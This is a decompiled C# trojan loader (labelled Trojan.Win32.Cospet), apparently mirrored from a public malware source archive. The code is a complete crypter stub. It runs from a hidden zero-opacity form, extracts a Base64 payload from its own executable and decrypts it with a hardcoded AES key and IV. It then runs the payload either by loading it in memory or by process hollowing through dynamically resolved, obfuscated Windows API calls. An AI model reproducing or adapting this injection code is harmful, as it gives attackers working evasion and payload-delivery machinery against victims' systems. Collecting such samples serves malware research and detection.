mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-22 03:16:11 +00:00
281 lines
12 KiB
C#
281 lines
12 KiB
C#
// Decompiled with JetBrains decompiler
|
|
// Type: Yi0GE2NLaKY9cPmB45.l1YmlpPMvQyqqZeffw
|
|
// Assembly: Service, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
|
|
// MVID: 7876418B-9B45-4205-B20B-41AA64972C85
|
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Cospet.iat-d5a913ab25c2ac01f6ad36151285d226598951b3a4f0b2d52c03e99ff09f0807.exe
|
|
|
|
using lIMo5cXu7QVSJ7hdyJ;
|
|
using Microsoft.VisualBasic;
|
|
using Microsoft.VisualBasic.CompilerServices;
|
|
using System;
|
|
using System.ComponentModel;
|
|
using System.Diagnostics;
|
|
using System.Drawing;
|
|
using System.IO;
|
|
using System.Reflection;
|
|
using System.Runtime.CompilerServices;
|
|
using System.Runtime.InteropServices;
|
|
using System.Security.Cryptography;
|
|
using System.Text;
|
|
using System.Threading;
|
|
using System.Windows.Forms;
|
|
using TmwCXiWu118CwLLcBx;
|
|
|
|
namespace Yi0GE2NLaKY9cPmB45
|
|
{
|
|
[DesignerGenerated]
|
|
internal class l1YmlpPMvQyqqZeffw : Form
|
|
{
|
|
private IContainer u0ejtRg5C;
|
|
private const string SXcEpLecu = "ᅕჯᅀᅕᄱᆲᆂᄐᅘᅕᆂၺᄷᅉᄢᄮᄽᆝᆲᆯᄄᆋᅿᇍᄊᄮჾᇊᅭᅘეၓᇷᆠᆋᆈᄁᆗრᅒᆻᅃᇐᆝᆗሆᇟᅿᆗဗᇱეᆻᇄሃᄥᇨᅉᇨᄢ̏Ϫ";
|
|
|
|
[MethodImpl(MethodImplOptions.NoInlining)]
|
|
public l1YmlpPMvQyqqZeffw()
|
|
{
|
|
qriSERnLWqCHHxhiWL.mQJJcrKz2UjcR();
|
|
// ISSUE: explicit constructor call
|
|
base.\u002Ector();
|
|
this.Load += new EventHandler(this.ORG997Eyt);
|
|
this.u1SVD5csY();
|
|
}
|
|
|
|
[DebuggerNonUserCode]
|
|
[MethodImpl(MethodImplOptions.NoInlining)]
|
|
protected override void Dispose([In] bool obj0)
|
|
{
|
|
try
|
|
{
|
|
if (!obj0 || this.u0ejtRg5C == null)
|
|
return;
|
|
this.u0ejtRg5C.Dispose();
|
|
}
|
|
finally
|
|
{
|
|
base.Dispose(obj0);
|
|
}
|
|
}
|
|
|
|
[DebuggerStepThrough]
|
|
[MethodImpl(MethodImplOptions.NoInlining)]
|
|
private void u1SVD5csY()
|
|
{
|
|
this.SuspendLayout();
|
|
this.AutoScaleDimensions = new SizeF(6f, 13f);
|
|
this.AutoScaleMode = AutoScaleMode.Font;
|
|
this.ClientSize = new Size(10, 10);
|
|
this.FormBorderStyle = FormBorderStyle.None;
|
|
this.Name = tcJNIpeNWph4hwAAuQ.Uj1VGPQhn(190);
|
|
this.Opacity = 0.0;
|
|
this.ShowIcon = false;
|
|
this.ShowInTaskbar = false;
|
|
this.WindowState = FormWindowState.Minimized;
|
|
this.ResumeLayout(false);
|
|
}
|
|
|
|
[MethodImpl(MethodImplOptions.NoInlining)]
|
|
private void rSSBpBKPm([In] byte[] obj0)
|
|
{
|
|
Assembly assembly = Assembly.Load(obj0);
|
|
MethodInfo entryPoint = assembly.EntryPoint;
|
|
object objectValue = RuntimeHelpers.GetObjectValue(RuntimeHelpers.GetObjectValue(RuntimeHelpers.GetObjectValue(assembly.CreateInstance(entryPoint.Name))));
|
|
entryPoint.Invoke(RuntimeHelpers.GetObjectValue(RuntimeHelpers.GetObjectValue(RuntimeHelpers.GetObjectValue(objectValue))), new object[1]
|
|
{
|
|
(object) new string[1]
|
|
{
|
|
tcJNIpeNWph4hwAAuQ.Uj1VGPQhn(204)
|
|
}
|
|
});
|
|
}
|
|
|
|
[MethodImpl(MethodImplOptions.NoInlining)]
|
|
private void ORG997Eyt([In] object obj0_1, [In] EventArgs obj1)
|
|
{
|
|
string[] strArray = Strings.Split(File.ReadAllText(Application.ExecutablePath), tcJNIpeNWph4hwAAuQ.Uj1VGPQhn(210));
|
|
byte[] parameter = this.li87Z8Ac6(Convert.FromBase64String(strArray[1]));
|
|
Encoding.GetEncoding(1252).GetBytes(strArray[1]);
|
|
if (Conversions.ToBoolean(strArray[2]))
|
|
{
|
|
Thread thread = new Thread((ParameterizedThreadStart) (obj0_2 => this.rSSBpBKPm((byte[]) obj0_2)));
|
|
thread.TrySetApartmentState(ApartmentState.STA);
|
|
thread.Start((object) parameter);
|
|
}
|
|
else
|
|
this.lElT0QhP0(parameter, tcJNIpeNWph4hwAAuQ.Uj1VGPQhn(338));
|
|
}
|
|
|
|
[DllImport("kernel32", EntryPoint = "LoadLibraryA", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern IntPtr \u0036jCbOnaNR([MarshalAs(UnmanagedType.VBByRefStr)] ref string _param0);
|
|
|
|
[DllImport("kernel32", EntryPoint = "GetProcAddress", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern IntPtr pp7vagxki([In] IntPtr obj0, [MarshalAs(UnmanagedType.VBByRefStr)] ref string _param1);
|
|
|
|
[MethodImpl(MethodImplOptions.NoInlining)]
|
|
public T w62GtbsBB<T>([In] string obj0, [In] string obj1) => (T) Marshal.GetDelegateForFunctionPointer(l1YmlpPMvQyqqZeffw.pp7vagxki(l1YmlpPMvQyqqZeffw.\u0036jCbOnaNR(ref obj0), ref obj1), typeof (T));
|
|
|
|
[MethodImpl(MethodImplOptions.NoInlining)]
|
|
public bool lElT0QhP0([In] byte[] obj0, [In] string obj1)
|
|
{
|
|
l1YmlpPMvQyqqZeffw.\u0039klfPRdkUkcORZqXqJ obj2 = this.w62GtbsBB<l1YmlpPMvQyqqZeffw.\u0039klfPRdkUkcORZqXqJ>(Encoding.UTF8.GetString(Convert.FromBase64String(tcJNIpeNWph4hwAAuQ.Uj1VGPQhn(448))), Encoding.UTF8.GetString(Convert.FromBase64String(tcJNIpeNWph4hwAAuQ.Uj1VGPQhn(476))));
|
|
l1YmlpPMvQyqqZeffw.r9hFs0ZTHQaZ334oHv r9hFs0ZthQaZ334oHv = this.w62GtbsBB<l1YmlpPMvQyqqZeffw.r9hFs0ZTHQaZ334oHv>(Encoding.UTF8.GetString(Convert.FromBase64String(tcJNIpeNWph4hwAAuQ.Uj1VGPQhn(520))), Encoding.UTF8.GetString(Convert.FromBase64String(tcJNIpeNWph4hwAAuQ.Uj1VGPQhn(548))));
|
|
l1YmlpPMvQyqqZeffw.DR45xqt8vapkmdO5jX dr45xqt8vapkmdO5jX = this.w62GtbsBB<l1YmlpPMvQyqqZeffw.DR45xqt8vapkmdO5jX>(Encoding.UTF8.GetString(Convert.FromBase64String(tcJNIpeNWph4hwAAuQ.Uj1VGPQhn(600))), Encoding.UTF8.GetString(Convert.FromBase64String(tcJNIpeNWph4hwAAuQ.Uj1VGPQhn(628))));
|
|
l1YmlpPMvQyqqZeffw.ZfvhinbtZbMtI7F6cm zfvhinbtZbMtI7F6cm = this.w62GtbsBB<l1YmlpPMvQyqqZeffw.ZfvhinbtZbMtI7F6cm>(Encoding.UTF8.GetString(Convert.FromBase64String(tcJNIpeNWph4hwAAuQ.Uj1VGPQhn(680))), Encoding.UTF8.GetString(Convert.FromBase64String(tcJNIpeNWph4hwAAuQ.Uj1VGPQhn(708))));
|
|
l1YmlpPMvQyqqZeffw.qgK3lty9wFb990IxNy k3lty9wFb990IxNy = this.w62GtbsBB<l1YmlpPMvQyqqZeffw.qgK3lty9wFb990IxNy>(Encoding.UTF8.GetString(Convert.FromBase64String(tcJNIpeNWph4hwAAuQ.Uj1VGPQhn(752))), Encoding.UTF8.GetString(Convert.FromBase64String(tcJNIpeNWph4hwAAuQ.Uj1VGPQhn(780))));
|
|
l1YmlpPMvQyqqZeffw.hEqihWru9Nn70v7FBD eqihWru9Nn70v7Fbd = this.w62GtbsBB<l1YmlpPMvQyqqZeffw.hEqihWru9Nn70v7FBD>(Encoding.UTF8.GetString(Convert.FromBase64String(tcJNIpeNWph4hwAAuQ.Uj1VGPQhn(832))), Encoding.UTF8.GetString(Convert.FromBase64String(tcJNIpeNWph4hwAAuQ.Uj1VGPQhn(860))));
|
|
l1YmlpPMvQyqqZeffw.Ayi64li1PRJMwO41ZT ayi64li1PrjMwO41Zt = this.w62GtbsBB<l1YmlpPMvQyqqZeffw.Ayi64li1PRJMwO41ZT>(Encoding.UTF8.GetString(Convert.FromBase64String(tcJNIpeNWph4hwAAuQ.Uj1VGPQhn(912))), Encoding.UTF8.GetString(Convert.FromBase64String(tcJNIpeNWph4hwAAuQ.Uj1VGPQhn(940))));
|
|
l1YmlpPMvQyqqZeffw.\u00331cnlp5hhg963mPuNg obj3 = this.w62GtbsBB<l1YmlpPMvQyqqZeffw.\u00331cnlp5hhg963mPuNg>(Encoding.UTF8.GetString(Convert.FromBase64String(tcJNIpeNWph4hwAAuQ.Uj1VGPQhn(976))), Encoding.UTF8.GetString(Convert.FromBase64String(tcJNIpeNWph4hwAAuQ.Uj1VGPQhn(996))));
|
|
bool flag;
|
|
try
|
|
{
|
|
IntPtr zero1 = IntPtr.Zero;
|
|
IntPtr[] numArray1 = new IntPtr[4];
|
|
byte[] numArray2 = new byte[68];
|
|
int int32_1 = BitConverter.ToInt32(obj0, 60);
|
|
int int16 = (int) BitConverter.ToInt16(obj0, checked (int32_1 + 6));
|
|
IntPtr num1 = new IntPtr(BitConverter.ToInt32(obj0, checked (int32_1 + 84)));
|
|
if (obj2((string) null, new StringBuilder(obj1), zero1, zero1, false, 4, zero1, (string) null, numArray2, numArray1))
|
|
{
|
|
uint[] numArray3 = new uint[179];
|
|
numArray3[0] = 65538U;
|
|
if (r9hFs0ZthQaZ334oHv(numArray1[1], numArray3))
|
|
{
|
|
IntPtr num2 = new IntPtr(checked ((long) numArray3[41] + 8L));
|
|
IntPtr zero2 = IntPtr.Zero;
|
|
IntPtr num3 = new IntPtr(4);
|
|
IntPtr zero3 = IntPtr.Zero;
|
|
if (dr45xqt8vapkmdO5jX(numArray1[0], num2, ref zero2, (int) num3, ref zero3) && obj3(numArray1[0], zero2) == 0U)
|
|
{
|
|
IntPtr num4 = new IntPtr(BitConverter.ToInt32(obj0, checked (int32_1 + 52)));
|
|
IntPtr num5 = new IntPtr(BitConverter.ToInt32(obj0, checked (int32_1 + 80)));
|
|
IntPtr num6 = zfvhinbtZbMtI7F6cm(numArray1[0], num4, num5, 12288, 64);
|
|
int int32_2 = num6.ToInt32();
|
|
int num7;
|
|
int num8 = k3lty9wFb990IxNy(numArray1[0], num6, obj0, checked ((uint) (int) num1), num7) ? 1 : 0;
|
|
int num9 = checked (int16 - 1);
|
|
int num10 = 0;
|
|
while (num10 <= num9)
|
|
{
|
|
int[] dst1 = new int[10];
|
|
Buffer.BlockCopy((Array) obj0, checked (int32_1 + 248 + num10 * 40), (Array) dst1, 0, 40);
|
|
byte[] dst2 = new byte[checked (dst1[4] - 1 + 1)];
|
|
Buffer.BlockCopy((Array) obj0, dst1[5], (Array) dst2, 0, dst2.Length);
|
|
num5 = new IntPtr(checked (int32_2 + dst1[3]));
|
|
num4 = new IntPtr(dst2.Length);
|
|
int num11 = k3lty9wFb990IxNy(numArray1[0], num5, dst2, checked ((uint) (int) num4), num7) ? 1 : 0;
|
|
checked { ++num10; }
|
|
}
|
|
num5 = new IntPtr(checked ((long) numArray3[41] + 8L));
|
|
num4 = new IntPtr(4);
|
|
int num12 = k3lty9wFb990IxNy(numArray1[0], num5, BitConverter.GetBytes(num6.ToInt32()), checked ((uint) (int) num4), num7) ? 1 : 0;
|
|
numArray3[44] = checked ((uint) (num6.ToInt32() + BitConverter.ToInt32(obj0, int32_1 + 40)));
|
|
int num13 = eqihWru9Nn70v7Fbd(numArray1[1], numArray3) ? 1 : 0;
|
|
}
|
|
}
|
|
int num14 = (int) ayi64li1PrjMwO41Zt(numArray1[1]);
|
|
}
|
|
}
|
|
catch (Exception ex)
|
|
{
|
|
ProjectData.SetProjectError(ex);
|
|
flag = false;
|
|
ProjectData.ClearProjectError();
|
|
goto label_11;
|
|
}
|
|
flag = true;
|
|
label_11:
|
|
return flag;
|
|
}
|
|
|
|
[MethodImpl(MethodImplOptions.NoInlining)]
|
|
public byte[] li87Z8Ac6([In] byte[] obj0)
|
|
{
|
|
using (RijndaelManaged rijndaelManaged = new RijndaelManaged())
|
|
{
|
|
rijndaelManaged.IV = new byte[16]
|
|
{
|
|
(byte) 1,
|
|
(byte) 2,
|
|
(byte) 3,
|
|
(byte) 4,
|
|
(byte) 5,
|
|
(byte) 6,
|
|
(byte) 7,
|
|
(byte) 8,
|
|
(byte) 9,
|
|
(byte) 1,
|
|
(byte) 2,
|
|
(byte) 3,
|
|
(byte) 4,
|
|
(byte) 5,
|
|
(byte) 6,
|
|
(byte) 7
|
|
};
|
|
rijndaelManaged.Key = new byte[16]
|
|
{
|
|
(byte) 7,
|
|
(byte) 6,
|
|
(byte) 5,
|
|
(byte) 4,
|
|
(byte) 3,
|
|
(byte) 2,
|
|
(byte) 1,
|
|
(byte) 9,
|
|
(byte) 8,
|
|
(byte) 7,
|
|
(byte) 6,
|
|
(byte) 5,
|
|
(byte) 4,
|
|
(byte) 3,
|
|
(byte) 2,
|
|
(byte) 1
|
|
};
|
|
return rijndaelManaged.CreateDecryptor().TransformFinalBlock(obj0, 0, obj0.Length);
|
|
}
|
|
}
|
|
|
|
[return: MarshalAs(UnmanagedType.Bool)]
|
|
public delegate bool \u0039klfPRdkUkcORZqXqJ(
|
|
[In] string obj0,
|
|
[In] StringBuilder obj1,
|
|
[In] IntPtr obj2,
|
|
[In] IntPtr obj3,
|
|
[MarshalAs(UnmanagedType.Bool)] bool _param5,
|
|
[In] int obj5,
|
|
[In] IntPtr obj6,
|
|
[In] string obj7,
|
|
[In] byte[] obj8,
|
|
[In] IntPtr[] obj9);
|
|
|
|
public delegate bool qgK3lty9wFb990IxNy(
|
|
[In] IntPtr obj0,
|
|
[In] IntPtr obj1,
|
|
[In] byte[] obj2,
|
|
[In] uint obj3,
|
|
[In] int obj4);
|
|
|
|
[return: MarshalAs(UnmanagedType.Bool)]
|
|
public delegate bool DR45xqt8vapkmdO5jX(
|
|
[In] IntPtr obj0,
|
|
[In] IntPtr obj1,
|
|
[In] ref IntPtr obj2,
|
|
[In] int obj3,
|
|
[In] ref IntPtr obj4);
|
|
|
|
public delegate IntPtr ZfvhinbtZbMtI7F6cm(
|
|
[In] IntPtr obj0,
|
|
[In] IntPtr obj1,
|
|
[In] IntPtr obj2,
|
|
[In] int obj3,
|
|
[In] int obj4);
|
|
|
|
public delegate uint \u00331cnlp5hhg963mPuNg([In] IntPtr obj0, [In] IntPtr obj1);
|
|
|
|
public delegate uint Ayi64li1PRJMwO41ZT([In] IntPtr obj0);
|
|
|
|
[return: MarshalAs(UnmanagedType.Bool)]
|
|
public delegate bool r9hFs0ZTHQaZ334oHv([In] IntPtr obj0, [In] uint[] obj1);
|
|
|
|
[return: MarshalAs(UnmanagedType.Bool)]
|
|
public delegate bool hEqihWru9Nn70v7FBD([In] IntPtr obj0, [In] uint[] obj1);
|
|
}
|
|
}
|